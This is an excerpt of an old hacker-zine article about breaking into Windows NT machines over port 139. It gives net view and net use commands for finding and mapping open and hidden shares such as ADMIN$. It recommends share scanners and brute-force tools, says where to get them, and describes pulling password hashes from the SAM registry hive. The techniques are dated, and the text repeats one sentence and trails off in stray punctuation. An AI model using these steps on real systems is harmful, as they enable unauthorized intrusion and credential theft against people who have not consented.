2.) Kurruppt2k. "Security Through NT? Not Likely", HQ Vol16 #4 pp.7-9. (Only excerpts of this article are provided here) Now, this entire article refers to breaking into NT over the Internet, so logging in isn't feasible .... . If port 139 is open though(which it almost always is on an NT Server, and oftentimes is on NT Workstation and Windows 9.x), you can use Client for Microsoft Networks to connect to it. First make sure you have the client installed - go to Control Panel, then Network (you should also have NetBIOS, NetBEUI, and TCP/IP installed). You will use the Net command to do this. Once you find your target NT machine and see an open port 139, your first step is to find out if there are any open shares. To find out, type this at a command prompt: C:\net view\\[ip address] If you get an error message, it probably means that the computer you attempted to connect to had no open shares (or possibly that you don't have Windows Networking set up correctly on your machine, so check!). If shares exist, you will see a list of them, including the share name, share type (disk, printer,etc.),and any comments the sysadmin wanted to mention. For more NetBIOS information on this machine, use the "nbstat" command. If you see no open shares, there is still a possibility of hidden shares. Common hidden share names include: *(samba) ...... *SMB(samba) ..... *SMBSERVER(samba) ... ADMIN$(remote administration - can you say "root shell"?) To connect to any share, visible or hidden, you again use the Net command, in the follownig fashion: C:\net use i: \\[ip address]\[share name] To check for hidden shares, just try to connect to the names given above, or any others you can think of. If it exists, you'll connect. Once you receive the "The command was completed successfully" message, you are connected to the NT machine. Logical drive I:(or whatever drive letter you assigned) now becomes that share - you've mapped a network drive to it. This is similar to mounting remote filesystems in UNIX. So to see what you've connected to, change the drive to I: and issue a "dir". You can now use any DOS commands to explore the share. The share however may be password protected. ....... ...... Utilities Here I will outline a few useful tools you should have when planning to break into an NT box. Legion is a Windows sharescanner - it will automate doing Net View commands on an entire subnet (or multiple subnets). Launch it, sit back, and watch as it combs networks for open shares. If you prefer doing everything from UNIX, WinHack Gold will do the same thing. NAT(Networking Auditing Tool) is a great program by the makers of Legion. It will attempt to connect to any open share you specify, attacking with passwords you provide in a wordlist. It also looks for hidden shares. LOphtCrack is an NT password cracker. Getting NT passwords can be tricky - see th "Password Cracking" section. And finally AGENT SMITH. This program will essentially brute force the hell out of the target, and log all responses to a file of your choice. Often- times this will be your only way to break through password protection on your share. All four of these programs are available at The CyberUnderground (www.users.uswest.net/~kurruppt2k). Password Cracking All the hashes reside in the SAM (Security Account Manager) hive of the registry. To get to the hive, you have a few options.All the hashes reside in the SAM (Security Account Manager) hive of the registry. To get to the hive, you have a few options. If you're running Windows NT yourself, you can install L0phtCrack and attempt a Remote Registry Dump. If the machine you're targeting allows for registry sharing, you will have the entire SAM hive imported into LOpht. Most often, though, this doesn't work. You could always do a core dump, convert the autopsied data into ASCII, and pick out the hashes. , ,